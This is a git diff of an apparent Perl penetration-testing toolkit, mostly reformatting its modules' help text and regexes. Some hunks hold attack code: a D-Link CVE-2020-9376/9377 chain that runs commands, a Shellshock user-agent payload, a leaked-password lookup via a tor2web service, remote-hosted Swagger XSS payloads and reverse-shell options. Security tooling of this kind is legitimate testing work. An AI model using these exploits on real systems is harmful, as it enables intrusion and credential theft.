+ if ($target !~ /^http(?:s)?:\/\//x){
$target = "https://$target";
}
@@ -32,16 +32,19 @@ package Spellbook::Exploit::Django_Debug {
}
}
}
-
+
return @results
}
if ($help) {
- return "
- \rExploit::Django_Debug
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target";
+ return<<"EOT";
+
+Exploit::Django_Debug
+=======================
+-h, --help See this menu
+-t, --target Define a target";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm
index e7d8540..f2d49a5 100644
--- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm
+++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm
@@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK {
use Spellbook::Recon::Query_Shodan;
use Spellbook::Advisory::CVE_2020_9376;
use Spellbook::Advisory::CVE_2020_9377;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, $payload, @results);
@@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]);
if ($credentials) {
- my ($username, $password) = split /:/, $credentials;
+ my ($username, $password) = split /:/x, $credentials;
- if (!$password) {
+ if (!$password) {
$password = "admin";
}
if ($username) {
my $userAgent = LWP::UserAgent->new();
- my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
-
+ my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA=";
+
my $headers = HTTP::Headers->new (
"Content-Type" => "application/x-www-form-urlencoded",
"Cookie" => "uid=zwUEueUOvi",
@@ -48,16 +48,16 @@ package Spellbook::Exploit::Fullchain_DLINK {
"Connection" => "keep-alive"
);
- my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload);
+ my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload);
my $response = $userAgent -> request($request);
-
- if ($response -> is_success) {
+
+ if ($response -> is_success) {
my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([
"--target" => $target,
"--cookie" => "zwUEueUOvi",
"--payload" => "uname -a"
]);
-
+
if ($exploit[0] ne "Authenication fail") {
push @results, @exploit;
}
@@ -69,12 +69,15 @@ package Spellbook::Exploit::Fullchain_DLINK {
}
if ($help) {
- return "
- \rExploit::Fullchain_DLINK
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-p, --payload Send a command\n\n";
+ return<<"EOT";
+
+Exploit::Fullchain_DLINK
+=======================
+-h, --help See this menu
+-t, --target Define a target
+-p, --payload Send a command\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm
index b40ca6c..1ccdb33 100644
--- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm
+++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm
@@ -1,7 +1,7 @@
package Spellbook::Exploit::HAProxy_Exposed {
use strict;
use warnings;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -14,14 +14,17 @@ package Spellbook::Exploit::HAProxy_Exposed {
if ($target) {
return @result;
- }
+ }
if ($help) {
- return "
- \rExploit::HAProxy_Exposed
- \r=====================
- \r-h, --help See this menu
- \r-t, --target \n\n";
+ return<<"EOT";
+
+Exploit::HAProxy_Exposed
+=====================
+-h, --help See this menu
+-t, --target \n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm
index fa75e01..168352c 100644
--- a/lib/Spellbook/Exploit/Headers_Misconfig.pm
+++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm
@@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -35,16 +35,19 @@ package Spellbook::Exploit::Headers_Misconfig {
push @results, "$target don't have $header header.";
}
}
-
+
return @results;
}
if ($help) {
- return "
- \rExploit::Headers_Misconfig
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
+ return<<"EOT";
+
+Exploit::Headers_Misconfig
+=======================
+-h, --help See this menu
+-t, --target Define a target\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm
index c54967a..211bfbc 100644
--- a/lib/Spellbook/Exploit/Mixed_Content.pm
+++ b/lib/Spellbook/Exploit/Mixed_Content.pm
@@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content {
use strict;
use warnings;
use Spellbook::Core::UserAgent;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result, @urls);
@@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content {
if ($target) {
if ($target =~ /^http:\/\//x) {
- $target =~ s/^http:\/\///x;
+ $target =~ s/^http:\/\///x;
}
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
-
+
my $userAgent = Spellbook::Core::UserAgent -> new ();
my $request = $userAgent -> get($target);
for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){
- push @urls, $1;
+ push @urls, $1;
}
foreach my $url (@urls) {
@@ -36,15 +36,17 @@ package Spellbook::Exploit::Mixed_Content {
}
return @result;
- }
+ }
if ($help) {
- return "
- \rExploit::Mixed_Content
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define a target to perform the analysis\n
- ";
+ return<<"EOT";
+
+Exploit::Mixed_Content
+=====================
+-h, --help See this menu
+-t, --target Define a target to perform the analysis\n;
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm
index dfc794b..4ae6efe 100644
--- a/lib/Spellbook/Exploit/None_Attack.pm
+++ b/lib/Spellbook/Exploit/None_Attack.pm
@@ -1,8 +1,8 @@
package Spellbook::Exploit::None_Attack {
use strict;
use warnings;
-
- sub new {
+
+ sub new {
my ($self, $parameters) = @_;
my ($help, @result);
@@ -13,13 +13,16 @@ package Spellbook::Exploit::None_Attack {
if (1) {
return @result;
- }
+ }
if ($help) {
- return "
- \rExploit::None_Attack
- \r=====================
- \r-h, --help See this menu\n\n";
+ return<<"EOT";
+
+Exploit::None_Attack
+=====================
+-h, --help See this menu\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm
index a3a976b..64fa9a8 100644
--- a/lib/Spellbook/Exploit/Pwn_DB.pm
+++ b/lib/Spellbook/Exploit/Pwn_DB.pm
@@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB {
if ($target) {
my $useragent = Spellbook::Core::UserAgent -> new();
my $request = $useragent -> post(
- "https://pwndb2am4tzkvold.tor2web.io/",
+ "https://pwndb2am4tzkvold.tor2web.io/",
Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em"
);
@@ -29,19 +29,21 @@ package Spellbook::Exploit::Pwn_DB {
while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) {
if ($1 ne "donate") {
print "$1\@$target:$2\n";
- }
+ }
}
- }
+ }
}
}
-
+
if ($help) {
- return "
- \rExploit::Pwn_DB
- \r=======================
- \r-h, --help See this menu
- \r-t, --target Define a target\n
- ";
+ return<<"EOT";
+
+Exploit::Pwn_DB
+=======================
+-h, --help See this menu
+-t, --target Define a target\n;
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm
index afb0625..a055494 100644
--- a/lib/Spellbook/Exploit/Redis_Unauth.pm
+++ b/lib/Spellbook/Exploit/Redis_Unauth.pm
@@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth {
use warnings;
use Redis;
use Try::Tiny;
-
+
sub new {
my ($self, $parameters) = @_;
my ($help, $target, @result);
@@ -21,27 +21,30 @@ package Spellbook::Exploit::Redis_Unauth {
try {
my $redis = Redis -> new (
- server => $target,
+ server => $target,
name => "Spellbook",
cnx_timeout => 45
);
-
+
my $requirepass = $redis -> config_get ("requirepass") -> [1];
-
+
if (!defined($requirepass) || $requirepass eq "") {
push @result, $target;
}
};
return @result;
- }
+ }
if ($help) {
- return "
- \rExploit::Redis_Exposed
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a target to detect misconfigurations\n\n";
+ return<<"EOT";
+
+Exploit::Redis_Exposed
+=====================
+-h, --help See this menu
+-t, --target Set a target to detect misconfigurations\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm
index 59beaad..2e66736 100644
--- a/lib/Spellbook/Exploit/Reflected_XSS.pm
+++ b/lib/Spellbook/Exploit/Reflected_XSS.pm
@@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS {
$params -> remove($name);
$params -> append($name, $payload);
-
+
$parsed_url -> query($params);
try {
@@ -47,16 +47,19 @@ package Spellbook::Exploit::Reflected_XSS {
}
}
}
-
+
return @result;
}
if ($help) {
- return "
- \rExploit::Reflected_XSS
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set an website to see paths from WayBackMachine\n";
+ return<<"EOT";
+
+Exploit::Reflected_XSS
+=====================
+-h, --help See this menu
+-t, --target Set an website to see paths from WayBackMachine\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm
index 2a353b1..60cce59 100644
--- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm
+++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm
@@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
@@ -29,14 +29,17 @@ package Spellbook::Exploit::S3_Bucket_Takeover {
}
return @result;
- }
+ }
if ($help) {
- return "
- \rExploit::S3_Bucket_Takeover
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Check the possibility to takeover an s3 resource\n";
+ return<<"EOT";
+
+Exploit::S3_Bucket_Takeover
+=====================
+-h, --help See this menu
+-t, --target Check the possibility to takeover an s3 resource\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm
index 3b2e4a9..870e30f 100644
--- a/lib/Spellbook/Exploit/Shellshock.pm
+++ b/lib/Spellbook/Exploit/Shellshock.pm
@@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock {
agent => "() { :; }; echo; echo; /bin/bash -c 'ls'"
);
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -31,12 +31,15 @@ package Spellbook::Exploit::Shellshock {
}
if ($help) {
- return "
- \rExploit::Shellshock
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define a target
- \r-c, --command Define a command to delivery\n\n";
+ return<<"EOT";
+
+Exploit::Shellshock
+=====================
+-h, --help See this menu
+-t, --target Define a target
+-c, --command Define a command to delivery\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm
index 1b1832a..43e250e 100644
--- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm
+++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm
@@ -9,65 +9,71 @@ package Spellbook::Exploit::Subdomain_Takeover {
my ($self, $parameters) = @_;
my ($help, $target, @results);
- Getopt::Long::GetOptionsFromArray (
+ my %service_fingerprints = (
+ "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br",
+ "1eb970ce5a18bec7165f016df8238566" => "github.github.io",
+ "387caa8a924c5f92496824494b929207" => "heroku.com",
+ "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br",
+ "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io",
+ "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com",
+ "308be540e2821668fb15c42317b1a256" => "wpengine.com",
+ "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com",
+ "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com",
+ "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net",
+ "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net",
+ );
+
+ Getopt::Long::GetOptionsFromArray(
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
);
- if ($target) {
- $target =~ s/^http(s)?:\/\///x;
-
- my $resolv = Net::DNS::Resolver -> new();
- my $reply = $resolv -> search($target);
-
- if ($reply) {
- $target = "https://$target";
-
- foreach my $rr ($reply -> answer()) {
- if ($rr -> can("cname")) {
- my %hashes = (
- "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br",
- "1eb970ce5a18bec7165f016df8238566" => "github.github.io",
- "387caa8a924c5f92496824494b929207" => "heroku.com",
- "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br",
- "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io",
- "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com",
- "308be540e2821668fb15c42317b1a256" => "wpengine.com",
- "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com",
- "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com",
- "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net",
- "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net",
- # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase",
- # "648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com"
- );
-
- foreach (%hashes) {
- if ($rr -> cname() =~ m/$_/x) {
- my $useragent = Spellbook::Core::UserAgent -> new();
- my $request = $useragent -> get($target);
-
- if ($request -> code() == 200 || $request -> code() == 404) {
- my $md5 = md5_hex($request -> content());
-
- return @results, $target if $hashes{$md5};
- }
- }
- }
+ if ($help) {
+ return <<"EOT";
+
+Exploit::Subdomain_Takeover_Check
+==============
+-h, --help See this menu
+-t, --target Define a target
+
+EOT
+ }
+
+ return @results unless $target;
+
+ $target =~ s/^http(s)?:\/\///x;
+
+ my $resolv = Net::DNS::Resolver->new();
+ my $reply = $resolv->search($target);
+
+ return @results unless $reply;
+
+ $target = "https://$target";
+
+ foreach my $dns_resource ($reply->answer()) {
+ next unless $dns_resource->can("cname");
+
+ my $cname = $dns_resource->cname();
+
+ while (my ($hash, $service) = each %service_fingerprints) {
+ next unless $cname =~ m/$service/x;
+
+ my $useragent = Spellbook::Core::UserAgent->new();
+ my $response = $useragent->get($target);
+
+ if ($response->code() == 200 || $response->code() == 404) {
+ my $content_hash = md5_hex($response->content());
+
+ if ($hash eq $content_hash) {
+ push @results, $target;
+ last;
}
}
}
-
- return @results;
}
- if ($help) {
- return "
- \rExploit::Subdomain_Takeover_Check
- \r==============
- \r-h, --help See this menu
- \r-t, --target Define a target\n\n";
- }
+ return @results;
}
}
diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm
index 4fd032c..4972d0c 100644
--- a/lib/Spellbook/Exploit/Swagger_XSS.pm
+++ b/lib/Spellbook/Exploit/Swagger_XSS.pm
@@ -1,71 +1,67 @@
package Spellbook::Exploit::Swagger_XSS {
+
use strict;
use warnings;
use Spellbook::Core::UserAgent;
sub new {
my ($self, $parameters) = @_;
- my ($help, $target, @result);
+ my ($help, $target, @vulnerable_endpoints);
- Getopt::Long::GetOptionsFromArray (
+ Getopt::Long::GetOptionsFromArray(
$parameters,
"h|help" => \$help,
"t|target=s" => \$target
);
- if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
- $target = "https://$target";
- }
-
- $target =~ s/\/$//x;
- my $useragent = Spellbook::Core::UserAgent -> new();
-
- my @paths = (
- "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json",
- "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs",
- "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html",
- "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html"
- );
-
- foreach my $path (@paths) {
- my $request = $useragent -> get("$target$path");
-
- if ($request -> code() == 200) {
- if ($request -> content() =~ /(.*)<\/title>/x) {
- my $title = $1;
-
- if ($title =~ /Swagger UI/x) {
- my @payloads = (
- "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml",
- "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json"
- );
-
- foreach my $payload (@payloads) {
- my $endpoint = $target . $path . $payload;
- my $request = $useragent -> get($endpoint);
-
- if ($request -> code() == 200) {
- push @result, $endpoint;
- }
- }
- }
- }
- }
- }
+ if ($help) {
+ return <<"EOT";
+Exploit::Swagger_XSS
+=====================
+-h, --help See this menu
+-t, --target Set a target
- return @result;
+EOT
}
- if ($help) {
- return "
- \rExploit::Swagger_XSS
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set a target\n\n";
+ return 0 unless $target;
+
+ $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x;
+ $target =~ s/\/$//x;
+
+ my $useragent = Spellbook::Core::UserAgent->new();
+
+ my @paths = (
+ "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs",
+ "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs",
+ "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json",
+ "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html",
+ "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html",
+ "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html"
+ );
+
+ my @payloads = (
+ "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml",
+ "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json"
+ );
+
+ foreach my $path (@paths) {
+ my $base_url = "$target$path";
+ my $initial_response = $useragent->get($base_url);
+
+ next unless $initial_response->code() == 200;
+ next unless $initial_response->content() =~ /<title>(.*)<\/title>/x;
+ next unless $1 =~ /Swagger UI/;
+
+ foreach my $payload (@payloads) {
+ my $test_url = $base_url . $payload;
+ my $test_response = $useragent->get($test_url);
+
+ push @vulnerable_endpoints, $test_url if $test_response->code() == 200;
+ }
}
-
- return 0;
+
+ return @vulnerable_endpoints;
}
}
diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm
index 53a4f67..6829372 100644
--- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm
+++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm
@@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "https://$target";
}
@@ -32,11 +32,14 @@ package Spellbook::Exploit::Upload_Via_PUT {
}
if ($help) {
- return "
- \rRecon::Explioit
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Define\n\n";
+ return<<"EOT";
+
+Recon::Explioit
+=====================
+-h, --help See this menu
+-t, --target Define\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm
index 686884c..caa1bd5 100644
--- a/lib/Spellbook/Helper/CDN_Checker.pm
+++ b/lib/Spellbook/Helper/CDN_Checker.pm
@@ -7,54 +7,52 @@ package Spellbook::Helper::CDN_Checker {
use Spellbook::Recon::Get_IP;
sub new {
- my ($self, $parameters) = @_;
- my ($help, $target, @result);
+ my ($self, $parameters) = @_;
+ my ($help, $target, @result);
- Getopt::Long::GetOptionsFromArray (
- $parameters,
- "h|help" => \$help,
- "t|target=s" => \$target
- );
+ Getopt::Long::GetOptionsFromArray (
+ $parameters,
+ "h|help" => \$help,
+ "t|target=s" => \$target
+ );
+
+ return <<"EOT" if $help;
+
+Helper::CDN_Checker
+=====================
+-h, --help See this menu
+-t --target Define a target\n\n";
+
+EOT
+
+ return 0 unless $target;
- if ($target) {
my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]);
+ return 0 unless $ip;
+
+ my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json";
+ my $useragent = Spellbook::Core::UserAgent -> new ();
+ my $request = $useragent -> get($cnd_list);
+
+ return 0 unless $request->code == 200;
- if ($ip) {
- my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json";
- my $useragent = Spellbook::Core::UserAgent -> new ();
- my $request = $useragent -> get($cnd_list);
-
- if ($request -> code == 200) {
- my $data = decode_json($request -> content);
- my $content = $data -> {"cdn"}; # we have others options
-
- for (keys %{$content}) {
- for (@{$content -> {$_}}) {
- my $range = Net::IP -> new($_);
- my $value = Net::IP -> new($ip);
- my $match = $range -> overlaps($value);
-
- if ($match) {
- push @result, $target;
- }
- }
+ my $data = decode_json($request -> content);
+ my $content = $data -> {"cdn"}; # we have others options
+
+ my $target_ip = Net::IP->new($ip);
+
+ for my $provider (keys %{$content}) {
+ for my $range (@{$content->{$provider}}) {
+ my $cdn_range = Net::IP->new($range);
+ if ($cdn_range->overlaps($target_ip)) {
+ push @result, $target;
+ return @result;
}
}
}
return @result;
}
-
- if ($help) {
- return "
- \rHelper::CDN_Checker
- \r=====================
- \r-h, --help See this menu
- \r-t --target Define a target\n\n";
- }
-
- return 0;
- }
}
1;
\ No newline at end of file
diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm
index ea7fb0b..efe40a5 100755
--- a/lib/Spellbook/Helper/Exifs_Write.pm
+++ b/lib/Spellbook/Helper/Exifs_Write.pm
@@ -44,12 +44,15 @@ package Spellbook::Helper::Exifs_Write {
}
if ($help) {
- return "
- \rHelper::Exifs_Write
- \r=====================
- \r-h, --help See this menu
- \r-f, --file Define a file write the payload
- \r-p --payload Set a payload to write into file\n\n";
+ return<<"EOT";
+
+Helper::Exifs_Write
+=====================
+-h, --help See this menu
+-f, --file Define a file write the payload
+-p --payload Set a payload to write into file\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm
index eeb9157..e80b5c6 100644
--- a/lib/Spellbook/Helper/Generate_UUID.pm
+++ b/lib/Spellbook/Helper/Generate_UUID.pm
@@ -19,20 +19,23 @@ package Spellbook::Helper::Generate_UUID {
if ($version) {
for (my $i = 1; $i <= $repeat; $i++) {
my $generate = create_uuid_as_string($version);
-
+
push @result, $generate;
}
-
+
return @result;
}
if ($help) {
- return "
- \rHelper::Generate_UUID
- \r=====================
- \r-h, --help See this menu
- \r-v, --version Version of UUID algorithm
- \r-r, --repeat Quantities of repetitions\n\n";
+ return<<"EOT";
+
+Helper::Generate_UUID
+=====================
+-h, --help See this menu
+-v, --version Version of UUID algorithm
+-r, --repeat Quantities of repetitions\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm
index a786063..cf234e4 100644
--- a/lib/Spellbook/Helper/Host_Normalization.pm
+++ b/lib/Spellbook/Helper/Host_Normalization.pm
@@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization {
);
if ($target) {
- if ($target !~ /^http(s)?:\/\//x) {
+ if ($target !~ /^http(?:s)?:\/\//x) {
$target = "http://$target";
}
@@ -34,11 +34,14 @@ package Spellbook::Helper::Host_Normalization {
}
if ($help) {
- return "
- \rHelper::Host_Normalization
- \r==========================
- \r-h, --help See this menu
- \r-t, --target Define a target to normalize\n\n";
+ return<<"EOT";
+
+Helper::Host_Normalization
+==========================
+-h, --help See this menu
+-t, --target Define a target to normalize\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm
index cc615cd..1344ab5 100644
--- a/lib/Spellbook/Helper/Permutations.pm
+++ b/lib/Spellbook/Helper/Permutations.pm
@@ -25,20 +25,23 @@ package Spellbook::Helper::Permutations {
$chars[$i] = $chars[$random];
$chars[$random] = $temp;
}
-
+
push @result, join("", @chars);
}
-
- return @result;
+
+ return @result;
}
if ($help) {
- return "
- \rHelper::Permutations
- \r=====================
- \r-h, --help See this menu
- \r-v, --value Provide a seed
- \r-r, --repeat Quantities of repetitions\n\n";
+ return<<"EOT";
+
+Helper::Permutations
+=====================
+-h, --help See this menu
+-v, --value Provide a seed
+-r, --repeat Quantities of repetitions\n\n";
+
+EOT
}
return 0;
diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm
index a0c7ac8..cc39cba 100644
--- a/lib/Spellbook/Helper/Read_File.pm
+++ b/lib/Spellbook/Helper/Read_File.pm
@@ -2,12 +2,13 @@ package Spellbook::Helper::Read_File {
use strict;
use warnings;
use Spellbook::Core::Module;
+ use Carp qw(croak);
sub new {
- my ($self, $parameters)= @_;
+ my ($self, $parameters) = @_;
my ($help, $file, $entrypoint, @result);
- Getopt::Long::GetOptionsFromArray (
+ Getopt::Long::GetOptionsFromArray(
$parameters,
"h|help" => \$help,
"f|file=s" => \$file,
@@ -15,36 +16,36 @@ package Spellbook::Helper::Read_File {
);
if ($file) {
- open (my $filename, "<", $file);
+ local $/ = "\n";
+ open my $fh, "<", $file or croak "Failed to open file: $!";
+ my @lines = <$fh>;
+ close $fh;
- while (<$filename>) {
- chomp ($_);
+ for my $line (@lines) {
+ chomp($line);
if ($entrypoint) {
- my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]);
-
+ my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]);
if ($return) {
- push @result, $_;
+ push @result, $line;
}
}
-
else {
- push @result, $_;
+ push @result, $line;
}
}
-
- close ($filename);
-
return @result;
}
-
- return "
- \rHelper::Read_File
- \r=====================
- \r-h, --help See this menu
- \r-f, --file Define a file to read
- \r-e, --entrypoint Set a other module to send the output\n\n";
+ return <<"EOT";
+
+Helper::Read_File
+=====================
+-h, --help See this menu
+-f, --file Define a file to read
+-e, --entrypoint Set a other module to send the output
+
+EOT
}
}
diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm
index 5e7c3ae..e5a22d1 100644
--- a/lib/Spellbook/Helper/Reverse_Shell.pm
+++ b/lib/Spellbook/Helper/Reverse_Shell.pm
@@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell {
sub new {
my ($self, $parameters) = @_;
my ($help, $target);
-
+
my $port = 1337;
my $lang = "perl";
@@ -28,15 +28,18 @@ package Spellbook::Helper::Reverse_Shell {
}
if ($help) {
- return "
- \rHelper::Reverse_Shell
- \r=====================
- \r-h, --help See this menu
- \r-t, --target Set your IP/Host to send the reverse shell
- \r-p, --port Define a port to connect
- \r-l, --lang Default is perl, types avaible: perl, bash\n\n";
+ return<<"EOT";
+
+Helper::Reverse_Shell
+=====================
+-h, --help See this menu
+-t, --target Set your IP/Host to send the reverse shell
+-p, --port Define a port to connect
+-l, --lang Default is perl, types avaible: perl, bash\n\n";
+
+EOT
}
-
+
return 0;
}
}
diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm
index 79de620..4320c8d 100644
--- a/lib/Spellbook/Helper/Scope.pm
+++ b/lib/Spellbook/Helper/Scope.pm
@@ -42,16 +42,16 @@ package Spellbook::Helper::Scope {
push @results, $info;
}
}
-
+
if ($save) {
if ($keep && exists $yamlfile->[0]->{$save}) {
push @{$yamlfile->[0]->{$save}}, @results;
}
-
+
else {
$yamlfile->[0]->{$save} = [@results];
}
-
+
$yamlfile->write($scope);
}
@@ -59,17 +59,20 @@ package Spellbook::Helper::Scope {
}
if ($help) {
- return "
- \rHelper::Scope
- \r=====================
- \r-h, --help See this menu
- \r-S, --scope Define a YML file as a scope
- \r-i, --information Set an information to extract from your scope
- \r-e, --entrypoint Send informations to another entrypoint module
- \r-K, --keep Keep the current values in the file and add news values
